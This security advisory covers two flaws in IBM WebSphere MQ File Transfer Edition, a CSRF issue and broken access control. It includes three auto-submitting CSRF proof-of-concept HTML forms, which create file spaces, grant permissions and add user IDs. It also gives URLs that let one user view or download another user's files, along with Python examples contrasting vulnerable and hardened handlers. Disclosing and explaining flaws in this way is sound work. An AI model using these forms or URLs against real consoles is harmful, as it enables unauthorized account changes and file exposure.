Release date:
Updated on:
Affected Systems:
IBM WebSphere MQ 7.x
Description:
--------------------------------------------------------------------------------
Bugtraq ID: 54983
CVE ID: CVE-2012-3294, CVE-2012-2206
IBM WebSphere MQ provides message transmission services in enterprises.
IBM WebSphere MQ has two security vulnerabilities that malicious users can exploit to bypass certain security restrictions and to perform cross-site request forgery (CSRF) attacks.
1) The application performs certain operations in response to HTTP requests without verifying that the user intentionally issued those requests. A logged-on user who visits a malicious website can be made to create or edit a file space or to change file space permissions. This vulnerability exists in File Transfer Edition v7.0.3 and 7.0.4, Managed File Transfer v7.5.0, and other versions.
2) An error in the access-permission checks allows the files of other users to be downloaded. Successful exploitation requires knowing the URL of the target file. This vulnerability exists in File Transfer Edition v7.0.3 and 7.0.4, and other versions.
<* Source: Nir Valman
Link: http://www-01.ibm.com/support/docview.wss?uid=swg21607481
http://secunia.com/advisories/50225/
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
The following test method is provided:
*Exploit Details:*
*1. CSRF to add a user and define the quota on a user space*
I created the following HTML page and had a logged-on user open it:
<html>
<head></head>
<body>
<!-- Cross-site form post to the FTE console; the browser attaches the victim's session cookie automatically. -->
<form id="frm" name="frm" method="post"
      action="https://www.example.com/wmqfteconsole/Filespaces">
<input type="hidden" name="nirvcsrf" value="junk"/>
<input type="hidden" name="name" value="zzzzzz"/>
<input type="hidden" name="quota" value="15"/>
<input type="hidden" name="id" value="NewFileSpace"/>
</form>
<script>
// Submits the form as soon as the page loads, without any user interaction.
document.frm.submit();
</script>
</body>
</html>
The following screenshot shows the result of the CSRF attack:
[Screenshot omitted: inline image 1]
*2. CSRF to add permissions on file spaces*
I created the following HTML page and had a logged-on user open it:
<html>
<head></head>
<body>
<!-- Grants write access on the "zzzzzz" file space to another user via a forged post. -->
<form id="frm" name="frm" method="post"
      action="https://www.example.com/wmqfteconsole/FileSpacePermisssions">
<input type="hidden" name="nirvcsrf" value="junk"/>
<input type="hidden" name="user" value="bodek2"/>
<input type="hidden" name="write" value="authorized"/>
<input type="hidden" name="id" value="zzzzzz_TEMP_PERMISSIONS"/>
</form>
<script>
// Submits the form as soon as the page loads.
document.frm.submit();
</script>
</body>
</html>
*3. CSRF to add an MQMD user ID*
I created the following HTML page and had a logged-on user open it:
<html>
<head></head>
<body>
<!-- Maps a console user to an MQMD user ID via a forged post. -->
<form id="frm" name="frm" method="post"
      action="https://www.example.com/wmqfteconsole/UploadUsers">
<input type="hidden" name="nirvcsrf" value="junk"/>
<input type="hidden" name="userID" value="csrfUserId"/>
<input type="hidden" name="mqmdUserID" value="userIdTest"/>
<input type="hidden" name="id" value="NewUploadUser"/>
</form>
<script>
// Submits the form as soon as the page loads.
document.frm.submit();
</script>
</body>
</html>
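To make the missing check concrete, here is an added example (it is not part of the advisory and not IBM's code) that models the console's Filespaces handler in Python, first behaving as the advisory describes and then with a per-session anti-CSRF token and an Origin check. The field name csrf_token, the session store and the console origin https://www.example.com are assumptions for illustration; the forged form fields are exactly those of the first PoC form above.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Assumed origin of the FTE web console (the PoC forms post to www.example.com).
CONSOLE_ORIGIN = "https://www.example.com"


@dataclass
class Session:
    """Server-side session resolved from the cookie. The browser attaches that
    cookie to posts triggered by an attacker's page too, so the session alone
    says nothing about where the form came from."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    path: str
    form: Dict[str, str]
    session: Optional[Session]
    origin: Optional[str] = None  # Origin header the browser adds to form posts


def filespaces_vulnerable(req: Request, store: Dict[str, dict]) -> Tuple[int, str]:
    """As the advisory describes it: any POST with the expected fields is honoured."""
    if req.session is None:
        return 401, "login required"
    name = req.form["name"]
    store[name] = {"owner": req.session.user, "quota": int(req.form["quota"])}
    return 200, "created " + name


def filespaces_hardened(req: Request, store: Dict[str, dict]) -> Tuple[int, str]:
    """Same action behind two checks: an Origin header, when present, must name
    the console itself, and the form must carry the session's anti-CSRF token
    (assumed field name csrf_token), which a foreign page cannot read."""
    if req.session is None:
        return 401, "login required"
    if req.origin is not None and req.origin != CONSOLE_ORIGIN:
        return 403, "cross-origin form post rejected"
    sent = req.form.get("csrf_token", "")
    if not hmac.compare_digest(sent, req.session.csrf_token):
        return 403, "missing or invalid CSRF token"
    name = req.form["name"]
    store[name] = {"owner": req.session.user, "quota": int(req.form["quota"])}
    return 200, "created " + name


# Fields of the advisory's first PoC form; "nirvcsrf" is whatever the attacker
# chooses, since nothing ties it to the victim's session.
POC_FORM = {"nirvcsrf": "junk", "name": "zzzzzz", "quota": "15", "id": "NewFileSpace"}


def run_csrf_scenario() -> Dict[str, object]:
    """Replays the PoC against both handlers, then a genuine console submission."""
    victim = Session(user="admin")
    results: Dict[str, object] = {}

    forged = Request("/wmqfteconsole/Filespaces", POC_FORM, victim,
                     origin="https://attacker.example")
    store_v: Dict[str, dict] = {}
    results["vulnerable_status"] = filespaces_vulnerable(forged, store_v)[0]
    results["vulnerable_created"] = "zzzzzz" in store_v

    store_h: Dict[str, dict] = {}
    results["hardened_status"] = filespaces_hardened(forged, store_h)[0]
    # Same forged post without an Origin header (older browsers): the token
    # check still rejects it.
    no_origin = Request("/wmqfteconsole/Filespaces", POC_FORM, victim)
    results["hardened_no_origin_status"] = filespaces_hardened(no_origin, store_h)[0]
    results["hardened_created"] = "zzzzzz" in store_h

    # A real submission from the console page carries the token it was rendered with.
    genuine = Request("/wmqfteconsole/Filespaces",
                      {**POC_FORM, "csrf_token": victim.csrf_token}, victim,
                      origin=CONSOLE_ORIGIN)
    results["genuine_status"] = filespaces_hardened(genuine, store_h)[0]
    results["genuine_created"] = "zzzzzz" in store_h
    return results


if __name__ == "__main__":
    for key, value in run_csrf_scenario().items():
        print(f"{key}: {value}")
```

The token check is the one that matters; the Origin check is defence in depth, because a browser that sends no Origin header (or a request crafted outside a browser) must still be refused when the token is absent.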
*Privilege Escalation Details:*
*1. Privilege escalation to view another user's files and file space*
I logged on as user "user2" (a non-administrative account with download/upload file permissions only) and sent a GET request to the following URL:
/transfer/?start=0&count=10&metadata=fteSampleSUSEr=user1
As a result, the response contained the data of "user1".
*2. Privilege escalation to download another user's files*
To execute the attack, the malicious user must know the file name and the related ID beforehand.
In this scenario the malicious user is "user2" and the attacked user is "user1".
If "user2" knows the URL of a file belonging to "user1", he can access that file; for example, "user2" is able to retrieve the following URL with a GET request:
/filespace/user1/414d512057514d5420202020202020eb3bfc4f2030df02/changedthisfilename.txt
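An added example (not the advisory's and not IBM's code) of the authorization that the two URLs above should have been subject to, written in Python: a "knows the URL" check as the advisory describes the behaviour, beside an object-level check that scopes file downloads and transfer listings to the authenticated caller. The grant table, the transfer records, the administrator group and the parameter names start and count are constructed sample data; the metadata key is copied from the advisory's URL as printed.

```python
from typing import Dict, List, Set, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample state. Names follow the advisory: user2 is a non-administrative
# account, user1 owns the file space that user2 must not read.
FILESPACE_GRANTS: Dict[str, Dict[str, Set[str]]] = {
    "user1": {"user1": {"read", "write"}},                       # owner only
    "shared": {"user1": {"read", "write"}, "user2": {"read"}},  # explicitly granted
}
ADMINS: Set[str] = {"fteadmin"}
TRANSFERS: List[dict] = [
    {"id": 1, "originator": "user1", "metadata": {"fteSampleSUSEr": "user1"}},
    {"id": 2, "originator": "user2", "metadata": {"fteSampleSUSEr": "user2"}},
    {"id": 3, "originator": "user1", "metadata": {"fteSampleSUSEr": "user1"}},
]

# The two URLs from the advisory.
USER1_FILE = ("/filespace/user1/"
              "414d512057514d5420202020202020eb3bfc4f2030df02/changedthisfilename.txt")
USER1_TRANSFERS = "/transfer/?start=0&count=10&metadata=fteSampleSUSEr=user1"


def download_allowed_vulnerable(requester: str, path: str) -> bool:
    """As in the advisory: any authenticated user who knows the URL gets the file."""
    parts = path.strip("/").split("/")
    return len(parts) == 4 and parts[0] == "filespace"


def download_allowed_hardened(requester: str, path: str) -> bool:
    """Object-level check: the file space owner, an administrator, or a user the
    owner explicitly granted read access. The file ID in the URL is not a secret."""
    parts = path.strip("/").split("/")
    if len(parts) != 4 or parts[0] != "filespace":
        return False
    owner = parts[1]
    if requester in ADMINS or requester == owner:
        return True
    return "read" in FILESPACE_GRANTS.get(owner, {}).get(requester, set())


def _query(url: str) -> Tuple[int, int, Dict[str, str]]:
    """Parses start, count and the key=value pairs of any metadata parameters."""
    q = parse_qs(urlsplit(url).query)
    meta = dict(item.split("=", 1) for item in q.get("metadata", []) if "=" in item)
    return int(q.get("start", ["0"])[0]), int(q.get("count", ["10"])[0]), meta


def _matches(record: dict, wanted: Dict[str, str]) -> bool:
    return all(record["metadata"].get(k) == v for k, v in wanted.items())


def list_transfers_vulnerable(requester: str, url: str) -> List[int]:
    """Filters on caller-supplied metadata only, so user2 simply asks for user1's rows."""
    start, count, wanted = _query(url)
    rows = [t["id"] for t in TRANSFERS if _matches(t, wanted)]
    return rows[start:start + count]


def list_transfers_hardened(requester: str, url: str) -> List[int]:
    """Restricts the result to the caller's own transfers before applying the
    caller's filter; only administrators see everyone's."""
    start, count, wanted = _query(url)
    visible = TRANSFERS if requester in ADMINS else [
        t for t in TRANSFERS if t["originator"] == requester]
    rows = [t["id"] for t in visible if _matches(t, wanted)]
    return rows[start:start + count]


if __name__ == "__main__":
    for who in ("user2", "user1", "fteadmin"):
        print(who, download_allowed_hardened(who, USER1_FILE),
              list_transfers_hardened(who, USER1_TRANSFERS))
```

The point of the hardened listing is that the requester's identity comes from the session, never from a query parameter: the metadata filter narrows what the caller may already see, it cannot widen it.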
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
IBM
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.ers.ibm.com/